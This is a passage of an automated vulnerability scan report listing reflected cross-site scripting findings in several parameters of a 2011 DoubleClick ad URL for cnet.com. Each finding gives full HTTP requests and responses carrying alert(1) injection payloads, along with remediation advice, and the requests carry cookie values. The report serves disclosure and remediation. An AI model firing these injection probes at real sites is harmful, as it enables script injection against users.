GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn1b1c7"-alert(1)-"3bd2dbe41e8&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
1-0%3B0%3B61499020%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn1b1c7"-alert(1)-"3bd2dbe41e8&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.2
...[SNIP]...

3.129. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f446'-alert(1)-'ad85bf69864 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and hard to make safe. Where possible, the application should not place user data in this context at all. Where it must, every character outside a strict alphanumeric allowlist should be escaped as \xHH (or \uHHHH) before the value is written into the quoted JavaScript string. HTML entity encoding does not help inside a script block, and escaping only the quote character a given string uses is not enough, since this report shows the same parameters reflected into both single- and double-quoted strings.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn1f446'-alert(1)-'ad85bf69864&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
1-0%3B0%3B61499020%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn1f446'-alert(1)-'ad85bf69864&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.2
...[SNIP]...

3.130. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3d52"-alert(1)-"8cd047b7e6e was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and hard to make safe. Where possible, the application should not place user data in this context at all. Where it must, every character outside a strict alphanumeric allowlist should be escaped as \xHH (or \uHHHH) before the value is written into the quoted JavaScript string. HTML entity encoding does not help inside a script block, and escaping only the quote character a given string uses is not enough, since this report shows the same parameters reflected into both single- and double-quoted strings.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_USb3d52"-alert(1)-"8cd047b7e6e&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
20%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_USb3d52"-alert(1)-"8cd047b7e6e&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJ
...[SNIP]...

3.131. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9916'-alert(1)-'a98a38d25af was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and hard to make safe. Where possible, the application should not place user data in this context at all. Where it must, every character outside a strict alphanumeric allowlist should be escaped as \xHH (or \uHHHH) before the value is written into the quoted JavaScript string. HTML entity encoding does not help inside a script block, and escaping only the quote character a given string uses is not enough, since this report shows the same parameters reflected into both single- and double-quoted strings.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_USc9916'-alert(1)-'a98a38d25af&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
20%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_USc9916'-alert(1)-'a98a38d25af&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJ
...[SNIP]...

3.132. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [nd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3887'-alert(1)-'475192829dd was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and hard to make safe. Where possible, the application should not place user data in this context at all. Where it must, every character outside a strict alphanumeric allowlist should be escaped as \xHH (or \uHHHH) before the value is written into the quoted JavaScript string. HTML entity encoding does not help inside a script block, and escaping only the quote character a given string uses is not enough, since this report shows the same parameters reflected into both single- and double-quoted strings.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686f3887'-alert(1)-'475192829dd&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
5690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686f3887'-alert(1)-'475192829dd&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04
...[SNIP]...

3.133. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [nd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55903"-alert(1)-"845905cb38 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and hard to make safe. Where possible, the application should not place user data in this context at all. Where it must, every character outside a strict alphanumeric allowlist should be escaped as \xHH (or \uHHHH) before the value is written into the quoted JavaScript string. HTML entity encoding does not help inside a script block, and escaping only the quote character a given string uses is not enough, since this report shows the same parameters reflected into both single- and double-quoted strings.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=3068655903"-alert(1)-"845905cb38&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54544

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
5690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=3068655903"-alert(1)-"845905cb38&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04
...[SNIP]...

3.134. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22a4c"-alert(1)-"de1f191fdee was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and hard to make safe. Where possible, the application should not place user data in this context at all. Where it must, every character outside a strict alphanumeric allowlist should be escaped as \xHH (or \uHHHH) before the value is written into the quoted JavaScript string. HTML entity encoding does not help inside a script block, and escaping only the quote character a given string uses is not enough, since this report shows the same parameters reflected into both single- and double-quoted strings.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a22a4c"-alert(1)-"de1f191fdee&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
19%3B0-0%3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a22a4c"-alert(1)-"de1f191fdee&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.
...[SNIP]...

3.135. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bb96'-alert(1)-'908dcb3612e was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and hard to make safe. Where possible, the application should not place user data in this context at all. Where it must, every character outside a strict alphanumeric allowlist should be escaped as \xHH (or \uHHHH) before the value is written into the quoted JavaScript string. HTML entity encoding does not help inside a script block, and escaping only the quote character a given string uses is not enough, since this report shows the same parameters reflected into both single- and double-quoted strings.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a4bb96'-alert(1)-'908dcb3612e&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
19%3B1-0%3B0%3B61499020%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a4bb96'-alert(1)-'908dcb3612e&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.
...[SNIP]...

3.136. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [oepartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cf37'-alert(1)-'450e0e876d3 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and hard to make safe. Where possible, the application should not place user data in this context at all. Where it must, every character outside a strict alphanumeric allowlist should be escaped as \xHH (or \uHHHH) before the value is written into the quoted JavaScript string. HTML entity encoding does not help inside a script block, and escaping only the quote character a given string uses is not enough, since this report shows the same parameters reflected into both single- and double-quoted strings.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=2cf37'-alert(1)-'450e0e876d3&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=2cf37'-alert(1)-'450e0e876d3&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.137. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [oepartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9378a"-alert(1)-"c9b031313ac was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

